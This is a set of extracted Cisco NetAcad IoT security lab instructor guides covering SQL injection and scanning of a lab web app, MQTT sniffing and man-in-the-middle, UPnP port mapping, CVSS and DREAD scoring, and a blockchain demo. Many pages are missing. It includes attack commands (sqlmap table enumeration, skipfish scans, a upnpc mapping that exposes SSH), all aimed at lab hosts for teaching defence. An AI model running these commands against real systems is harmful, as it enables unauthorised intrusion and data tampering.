No sensors will be able to post data to the application and users will not be able to monitor the IoT system. A
hacker has successfully exploited a vulnerability in the web application using an SQL injection attack.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 10 of 13 www.netacad.com
Lab - Web Application Vulnerability
To Action From
-- ------ ----
22/tcp ALLOW Anywhere
8080/tcp LIMIT Anywhere
80/tcp ALLOW Anywhere
22/tcp (v6) ALLOW Anywhere (v6)
8080/tcp (v6) LIMIT Anywhere (v6)
80/tcp (v6) ALLOW Anywhere (v6)
e. To view the log messages in real time when you perform the SQL injection, use the command tail -f
filename in a new SSH session into Raspberry Pi from Kali VM. Press Ctrl-C to stop the display when
finished.
pi@myPi:~ $ tail -f /var/log/kern.log
f. Issue the following command to perform an SQL injection again from the Kali VM terminal. You may need
to run it more than once to see the UFW log messages in the SSH session running tail.
root@kali:~# sqlmap -u http://203.0.113.12:8080/add/test?temperature=26 --
dbms=mysql -D vulnSensors --tables
g. After the SQL injection, you will see log messages issued by ufw.
<output omitted>
May 25 11:22:51 locahost kernel: [16954.665180] [UFW LIMIT BLOCK] IN=eth0 OUT=
MAC=b8:27:eb:cc:1c:9f:00:0c:29:9c:a3:c5:08:00:45:00:00:3c:d7:a6:40:00:40:06:da:ee
SRC=203.0.113.1 DST=203.0.113.12 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=55206 DF
PROTO=TCP SPT=56186 DPT=8080 WINDOW=29200 RES=0x00 SYN URGP=0
h. Exit sqlmap with Ctrl-Z if necessary. Run the skipfish command again with a different output folder name.
You should see UFW log messages in the PL-App terminal that show that skipfish was blocked.
root@kali:~# skipfish -O -L -Y -S /usr/share/skipfish/dictionaries/minimal.wl
-o vulnerable_app_results1 http://203.0.113.12:8080
i. It will take some time for skipfish to run. After the skipfish scan is complete, in a web browser on the Kali
VM, navigate to file:///root/<folder name>/index.html. In this example, it is
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 11 of 13 www.netacad.com
Lab - Web Application Vulnerability
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 12 of 13 www.netacad.com
Lab - Web Application Vulnerability
g. Refresh the web browser associated with your web application. What happened to the sensors table after
the drop table attack?
____________________________________________________________________________________
The table is still displaying.
Part 5: Clean Up
In this part of the lab you will return the Raspberry Pi to its default configuration.
Step 1: Remove the UFW rules that were created in this lab.
You can delete the rules by issuing the ufw reset command. This will deactivate ufw and remove all rules.
(pl-app) root@myPi:/home/pi/notebooks# ufw reset
Resetting all rules to installed defaults. Proceed with operation (y|n)? y
Backing up 'before6.rules' to '/etc/ufw/before6.rules.20181220_152657'
Backing up 'user.rules' to '/etc/ufw/user.rules.20181220_152657'
Backing up 'before.rules' to '/etc/ufw/before.rules.20181220_152657'
Backing up 'after.rules' to '/etc/ufw/after.rules.20181220_152657'
Backing up 'user6.rules' to '/etc/ufw/user6.rules.20181220_152657'
Backing up 'after6.rules' to '/etc/ufw/after6.rules.20181220_152657'
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 13 of 13 www.netacad.com
Lab - Hacking MQTT (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Topology
Required Resources
3 Raspberry Pi 3 devices, Model B or later
8GB Micro SD card (minimum required)
PC with IoTSec Kali VM
Network connectivity between PC and Raspberry Pi Devices
A Network Switch
Objectives
Part 1: Setting up a Publishing/Subscriber MQTT Infrastructure
Part 2: Sniffing Data using Kali
Part 3: Adding Username/Password Authentication
Part 4: Adding TLS protection
Background/Scenario
Message queuing telemetry transport (MQTT) is an extremely simple and lightweight publish/subscribe
messaging protocol. It is designed for IoT devices and uses minimal bandwidth and device resources. MQTT
is an ideal protocol for machine-to-machine (M2M) communications. MQTT uses the reserved TCP/IP port
1883 by default. When using MQTT over SSL, it uses the registered TCP/IP port 8883.
The MQTT protocol uses topics as a communication avenue. MQTT topics use a hierarchal structure, similar
to a file path. The structure is used for message filtering and routing. An MQTT client can subscribe to one
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 11 www.netacad.com
Lab - Hacking MQTT
topic or multiple topics using wildcards, # and +. MQTT does not allow publishing to topics using wildcards.
You can only publish to an individual topic. A published topic can be the output data from a sensor, for
example.
The MQTT broker is the server that handles communications between the publisher and subscriber. The
broker is responsible for receiving and filtering all messages and deciding which devices are interested in
which messages based on the message topic. The broker sends the messages to the clients that have
subscribed to the topic of the message.
In this lab, you will setup an MQTT infrastructure that includes a broker, publisher, and subscriber. You will
also publish MQTT messages and subscribe to MQTT topics. You will also secure MQTT communications
using username and password credentials and transport layer security (TLS). Finally, you will attack the
MQTT infrastructure by trying to intercept the MQTT communications between the clients and broker.
Instructor Note: This lab requires three Raspberry Pi devices that are configured in separate terminals
through PL-App. A fourth terminal is required to be open on the Kali VM. Managing the terminals and entering
the correct commands in the correct terminal may be a challenge for students.
The lab uses Mosquitto clients to create MQTT broker, subscriber, and publisher devices. It may be useful to
have the students become familiar with Mosquitto by visiting the website and looking at the documentation.
The lab also uses Ettercap, which is included in the Kali VM. Ettercap is a very interesting tool for creating
Man-in-the-Middle attacks. Various tutorials about Ettercap are available on the web.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 11 www.netacad.com
Lab - Hacking MQTT
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 11 www.netacad.com
Lab - Hacking MQTT
e. Go to the terminal for the device that will serve as the MQTT publisher. Change the prompt by entering
the command export PS1=" \u@publisher:\w$ ".
pi@myPi_3:~$ export PS1="\u@publisher:\w$ "
pi@publisher:~$
f. The publisher sends MQTT messages using the command mosquitto_pub. Messages are sent to the
broker. The broker distributes the message to the appropriate subscribers for the topic.
pi@publisher:~$ mosquitto_pub -d -h 203.0.113.11 -t cisco/iots/user -m "This
message has been sent over MQTT"
Client mosqpub/1593-publisher sending CONNECT
Client mosqpub/1593-publisher received CONNACK
Client mosqpub/1593-publisher sending PUBLISH (d0, q0, r0, m1,
'cisco/iots/user', ... (36 bytes))
Client mosqpub/1593-publisher sending DISCONNECT
Using the man pages or other resources, what is the topic for these MQTT messages?
____________________________________________________________________________________
cisco/iots/user
g. You should see the MQTT message appear in the subscriber terminal along with a number of MQTT
status messages.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 4 of 11 www.netacad.com
Lab - Hacking MQTT
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 5 of 11 www.netacad.com
Lab - Hacking MQTT
middle and is able to read and save messages that are not intended for it. The Kali VM then forwards the
messages on to the intended recipient, as you will see in the terminal for the subscriber Pi.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 6 of 11 www.netacad.com
Lab - Hacking MQTT
Answers will vary. If the hacker were able to connect a computer to the network, the hacker could use
Wireshark to determine that MQTT was in use, the IP address of the broker, and the topics that are being
published. The hacker could then publish rogue data that could activate a safety system, perhaps turning
on fire suppression systems or shutting down equipment.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 7 of 11 www.netacad.com
Lab - Hacking MQTT
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 8 of 11 www.netacad.com
Lab - Hacking MQTT
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 9 of 11 www.netacad.com
Lab - Hacking MQTT
e. Copy the mosquitto configuration file named mosquitto_tls.conf from the scripts folder to the current
working directory.
pi@broker:~ $ cp /home/pi/notebooks/Course\ Materials/4.\ IoT\
Security/scripts/mosquitto_tls.conf .
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 10 of 11 www.netacad.com
Lab - Hacking MQTT
No, because simple TLS provides only server-side authentication, not client.
Part 5: Clean Up
You will remove the files that were created in the lab and return the user settings to the state before this lab,
unless instructed otherwise by your instructor.
a. In the Kali VM, remove all the pcap files from the root user’s home directory.
root@kali:~# rm *.pcap
b. Use Ctrl+C in the broker and subscriber terminals to terminate the MQTT processes.
c. For the publisher and the subscriber, remove the TLS certificates.
pi@publisher:~$ rm ca.crt
rm: remove write-protected regular file 'ca.crt'? yes
d. For the broker, remove all the certificates and mosquito configuration files in the pi user’s home directory.
pi@broker:~$ rm ca.* *.conf localhost.* *.sh passwords
rm: remove write-protected regular file 'ca.crt'? yes
rm: remove write-protected regular file 'ca.key'? yes
rm: remove write-protected regular file 'localhost.crt'? yes
rm: remove write-protected regular file 'localhost.key'? yes
e. For the broker, restore the file permission for the mosquito.log file.
pi@broker:~$ sudo chmod 644 /var/log/mosquitto/mosquitto.log
f. For the broker, remove the user pi from the mosquito group.
pi@broker:~$ sudo deluser pi mosquitto
sudo deluser pi mosquitto
Removing user `pi' from group `mosquitto' ...
Done.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 11 of 11 www.netacad.com
Lab – UPnP Vulnerabilities (Instructor Version)
Instructor Note: Red font color and completed code cells indicate that the information appears in the instructor
copy only.
Lab Topology
Connectivity requirements. As shown in the topology, the Raspberry Pi will be configured as wireless client and
a wired router, requiring a second network connection. The Raspberry Pi and the PL-App/Kali host can be directly
connected. The switch is included in the topology to indicate that the Raspberry Pi could act as a gateway to an
entire network of hosts in its role as router between the internal and external networks.
Addressing
The Pi will acquire an address from the external network, while providing addresses to the internal network.
Objectives
Part 1: Configuring the Raspberry Pi as a wired router using a BASH script
Part 2: Connecting a Client to the Raspberry Pi
Part 3: Testing Ports using UPnP
Background / Scenario
Many home routers are Linux-based. To ease connectivity challenges, they offer services such as DHCP,
NAT, UPnP, and more. They also offer both wired and wireless connections to the local network while
protecting users from threats from the Internet. Unfortunately, these routers can be tricked to open various
ports that will permit access to the internal network by threat actors from the Internet.
In this lab, you will turn a Raspberry Pi into a working router. Unlike most routers, the Raspberry Pi will
connect to the network wirelessly using PL-App, and route wireless traffic into a local wired Ethernet network.
A client will be added and connectivity will be tested. The client will then use Universal Plug and Play (UPnP)
to open a communication port through the router without authentication.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 8 www.netacad.com
Lab - UPnP Vulnerabilities
Required Resources
• PC or laptop
• IoTSec Kali VM
• 8 GB Micro SD card (minimum required) with PL-App installed
• Raspberry Pi 3, Model B or later
• A wireless network connection
• Ethernet cables
• A switch
Predictable network interface names containing MAC addresses are becoming increasingly common.
Because they may break the script used in this lab, raspi-config may be used to transition back to traditional
interface names (eth0, eth1, wlan0, etc.). To learn more, read the following:
https://www.freedesktop.org/wiki/Software/systemd/PredictableNetworkInterfaceNames/
f. Enter the information for the SSID and password of your wireless network. Click OK to continue. Click
Yes when prompted to continue making changes to config. The SSID and password may be provided by
your instructor.
g. Open a terminal from the PL-App. Enter ifconfig to verify that the Raspberry Pi device is connected to the
WiFi network.
(pl-app) root@myPi:/home/pi/notebooks# ifconfig
<output omitted>
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.11.201 netmask 255.255.255.0 broadcast 192.168.11.255
inet6 fe80::7859:df95:f2de:59f2 prefixlen 64 scopeid 0x20<link>
ether b8:27:eb:38:e8:65 txqueuelen 1000 (Ethernet)
RX packets 71 bytes 6193 (6.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 383 bytes 42370 (41.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 8 www.netacad.com
Lab - UPnP Vulnerabilities
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 8 www.netacad.com
Lab - UPnP Vulnerabilities
Step 2: Verify open ports and create a new mapping using Linux.
A router should isolate the Internet from the LAN behind it. Ideally devices on the Internet would not be able to
open connections to devices in the LAN behind the router. UPnP allows an internal device to ask the router to
open a port in its firewall, allowing devices out on the Internet to reach the internal device. While there are a
few special cases where this is desirable, more often than not, allowing internal devices to use UPnP to open
ports is bad practice.
In this step, we will use the iptables Linux kernel firewall utility to observe the behavior of UPnP on the Pi.
a. Use the following commands on the Raspberry Pi to determine the open ports and view the routing
tables. Document the number of open ports.
(pl-app) root@myPi:/home/pi/notebooks# iptables -S
-P INPUT ACCEPT
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 4 of 8 www.netacad.com
Lab - UPnP Vulnerabilities
-P FORWARD ACCEPT
-P OUTPUT ACCEPT
<some output omitted>
-A FORWARD -i wlan0 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -i eth0 -o wlan0 -j ACCEPT
b. Use the netstat -tuna command to list the services (and theirs ports) running on the Pi.
(pl-app) root@myPi:/home/pi/notebooks# netstat -tuna
Is there a service running on port 49152? What service often listens to that port? Perform a Google
search and record your answer below.
____________________________________________________________________________________
____________________________________________________________________________________
Yes, a service is running on port 49152. Research on the Internet shows that Linux IGD uses port 49152
to run UPnP. In addition, research shows that the only standard port for UPnP is UPD port 1900. It is also
open on the Pi.
c. Before upnpc in the Kali VM can communicate with the Raspberry Pi, you must create a default route
pointing to the Pi. In the Kali VM, enter the following command:
root@kali:~# ip route add default via 203.0.113.254
Instructor Note: This default route should NOT be necessary as the Pi and Kali belong to the same
network. However, because of an upnpc implementation decision, communication cannot be established
without a default route.
d. In a terminal on IoTSec Kali VM, you will use upnpc to simulate an internal UPnP-ready device.
Upnpc is an UPnP client. Use the upnpc command to create a port mapping on the Raspberry Pi router.
In this case, the client’s IP is 203.0.113.1 (Kali’s IP). The command requests that the router expose the
client’s SSH port (port 22) to the Internet as port 1337, much as an IoT device would.
root@kali:~# upnpc -a 203.0.113.1 22 1337 tcp
upnpc : miniupnpc library test client, version 2.0.
(c) 2005-2017 Thomas Bernard.
Go to http://miniupnp.free.fr/ or https://miniupnp.tuxfamily.org/
for more information.
List of UPNP devices found on the network :
desc: http://203.0.113.254:49152/gatedesc.xml
st: urn:schemas-upnp-org:device:InternetGatewayDevice:1
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 5 of 8 www.netacad.com
Lab - UPnP Vulnerabilities
[0] 203.0.113.254:49152
j. Using the ID provided by the list in [ ], enter host get 0 to request more information in this example. Then
enter host summary 0 to display the results.
upnp> host get 0
Requesting device and service info for 203.0.113.254:49152 (this could take a
few seconds)...
Failed to retrieve actions from service actions list for service urn:schemas-
dummy-com:service:Dummy:1!
Host data enumeration complete!
Host: 203.0.113.254:49152
XML File: http://203.0.113.254:49152/gatedesc.xml
<output omitted>
k. Type exit to leave miranda.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 6 of 8 www.netacad.com
Lab - UPnP Vulnerabilities
Reflection
1. What is UPnP commonly used for in home networks?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
UPnP simplifies the setup of many home network devices such as printers, media servers, IoT devices and
digital assistants.
2. Consider your home network connection. Is UPnP running? What can be done to turn this service off?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary because students' home networks differ.
3. How can an attacker using a vulnerable IoT device take advantage of a UPnP-enabled router?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 7 of 8 www.netacad.com
Lab - UPnP Vulnerabilities
Answers will vary. The key here is that attackers can use compromised IoT devices as UPnP clients and
expose internal devices to the Internet.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 8 of 8 www.netacad.com
Lab - Using the CVSS (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Objectives
In this lab, you will explain the concepts behind a strong password.
Part 1: Researching the Details of the CVSS Metrics Used to Compute the CVSS Score
Part 2: Using the CVSS Calculator to Determine the Severity Level of a Vulnerability
Part 3: Reflecting on the Use and Results of the CVSS Calculator
Background / Scenario
CVSS refers to the Common Vulnerability Scoring System. It is a vendor-neutral, industry standard that offers
an open framework for conveying the severity of vulnerabilities. It helps to determine the urgency and priority
of responses to vulnerabilities. The CVSS model is designed to provide users with an overall composite score
representing the severity and risk of a vulnerability.
The results of a CVSS calculation are based on metrics and formulas. The metrics are in three distinct
categories that can be quantitatively or qualitatively measured.
This lab will provide you with a security vulnerability scenario, and it will be your job to use the CVSS
calculator and specification document to determine what the Base Score is.
Required Resources
• PC or mobile device with Internet access
Part 1: Researching the Details of the CVSS Metrics Used to Compute the
CVSS Score
To use the CVSS risk assessment scoring system, it is important to understand each of the metrics that are
used in the calculation. The Forum of Incident Response and Security Teams (FIRST) has been designated
as the custodian of the CVSS to promote its adoption globally. Their specification document is very useful in
helping to understand each of the metrics. The following URL describes the metrics used when calculating a
CVSS score:
https://www.first.org/cvss/specification-document
a. Navigate to the CVSS specification document link provided above. Use this resource to answer the
questions below.
List the three metric groups and briefly describe each of them.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Base – represents the characteristics of a vulnerability that are constant over time and across contexts.
The Base metric is further broken down into the Exploitability and Impact metrics.
© 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 3 www.netacad.com
Lab - Using the CVSS
Temporal – Measures the characteristics of a vulnerability that may change over time, but not across user
environments.
Environmental – This measures the aspects of a vulnerability that are rooted in a specific organization’s
environment.
What is the first metric used in the Base Metrics calculation? Describe the metric and all of the possible
values for this metric.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Attack Vector (AV) – Reflects the proximity of the threat to the vulnerable component. The more remote
the threat, the higher the severity.
Metric Value: Network – Vulnerable component is through OSI layer 3. This value implies that it is
remotely exploitable. Adjacent – Vulnerable component is through the network but is bound to the same
shared physical or logical network and cannot be accessed past a Layer 3 boundary (router). Local –
Attacker is likely logged in locally. Physical – the attacker must be able to physically touch or manipulate
the vulnerable component.
What is the difference between the High (H) and Low (L) values for the Attack Complexity (AC) metric?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The Low value indicates that specialized access conditions do not exist. An attacker can expect success
against the vulnerable component. The High value means that a successful attack depends on conditions
beyond the attacker’s control.
b. Read through the remaining metrics and their possible values for each of the components of for the Base
Metrics. Knowing where to find this information will be required for the next part of this lab.
© 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 3 www.netacad.com
Lab - Using the CVSS
For this part, we will use the CVSS Calculator from FIRST.org:
https://www.first.org/cvss/calculator/3.0
a. Navigate to the link for the calculator.
b. Select the appropriate values based on the description above for the Base Score.
What is the Base Score for the vulnerability described above?
____________________________________________________________________________________
____________________________________________________________________________________
Base Score: 9.1 (Critical) – CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
© 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 3 www.netacad.com
Lab – Assess Risk with DREAD (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Objectives
In this lab, you will use the DREAD risk assessment model to assess risk.
Part 1: Using the DREAD Scoring System to Assess Risk
Part 2: Using the DREAD System to Assess the Risk of a Described Vulnerability
Part 3: Reflecting on the Use of the DREAD Scoring System
Background / Scenario
DREAD is risk assessment model used to quantify risk related to security threats and to quantify potential
risks. It is not a vulnerability assessment tool, but it is part of the risk assessment. They differ because risks
are vulnerabilities that have been evaluated in the context of an organization based on previous attacks. The
same vulnerability may present vastly different levels of risk depending on the nature of the organization.
There are 5 categories used to compute the result:
o Damage Potential – If the threat is exploited, what is the damage potential?
o Reproducibility – How reproducible is the vulnerability?
o Exploitability – How difficult is it for the vulnerability to be exploited?
o Affected Users – What is the scale of the attack? How many users are affected by this vulnerability?
o Discoverability – How difficult is it to discover the attack?
There are multiple ways to score the DREAD risk assessment model. Microsoft uses a scoring system of 1, 2,
or 3 with 3 indicating the high risk for each category (STRIDE). However, for this lab, we will be using the
scoring system described by OWASP at the following link:
https://www.owasp.org/index.php/Threat_Risk_Modeling#DREAD
OWASP uses a scoring system of 0, 5, or 10 for each category with 10 indicating a more serious risk, and 0
indicating no risk. Discoverability is the only category that offers an additional option of 9. It is important to
refer back to this document when scoring each category for Part 1 of this lab.
Required Resources
PC or mobile device with Internet access
© 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 3 www.netacad.com
Lab – Assess Risk with DREAD
How would you score a threat that if exploited would cause complete system or data destruction?
____________________________________________________________________________________
10
How would you score a threat that anyone can find the details on how to exploit by using a search
engine?
____________________________________________________________________________________
9
© 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 3 www.netacad.com
Lab – Assess Risk with DREAD
Weighting could be implemented for each category. Numbers between 0 and 5 or 5 and 10 could be used for
each category to make it more granular.
What are some of the features or advantages of the DREAD system?
_______________________________________________________________________________________
_______________________________________________________________________________________
DREAD is very simple to use and understand. DREAD can be easily used to compare and prioritize risks in
order to determine which ones to handle first.
© 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 3 www.netacad.com
Lab – Blockchain Demo 2.0 (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Objectives
Complete the Blockchain Demo 2.0
Complete Reflection Questions
Background / Scenario
Blockchain is the technology behind the cryptocurrency, bitcoin. It uses a distributed database to
cryptographically secure transaction. Blockchain transactions are immutable.
In this lab, you will complete the Blockchain Demo 2.0 created by freeCodeCamp and answer some questions
about this technological innovation.
Instructor Note: Students should still be able to complete this lab if the website link is broken or no longer
available.
Required Resources
• A computer with Internet access
Reflection
1. What is the name of the first block created in a blockchain and what is its index value?
_______________________________________________________________________________________
_______________________________________________________________________________________
The first block is called the genesis block and its index value is 0.
2. List the six pieces of information stored in a block.
_______________________________________________________________________________________
_______________________________________________________________________________________
Each block includes the following information: index, timestamp, hash, previous hash, data, and nonce.
3. What is the purpose of the timestamp?
_______________________________________________________________________________________
_______________________________________________________________________________________
The timestamp is used to order the blockchain transactions.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 3 www.netacad.com
Lab - Blockchain Demo 2.0
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 3 www.netacad.com m
Lab - Blockchain Demo 2.0
10. How does a peer make sure all other peers have the latest and longest blockchain?
_______________________________________________________________________________________
_______________________________________________________________________________________
The peer broadcasts its latest blocks to all its peers. The timestamp determines who has the latest block.
11. Why is blockchain considered immutable?
_______________________________________________________________________________________
_______________________________________________________________________________________
As more blocks are added to the blockchain, early blocks become harder to hack. The hacker would have to
mine faster than the rest of the network, which would take massive processing power. In addition, the hacker
would have to own 51% or more of the peers.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 3 www.netacad.com m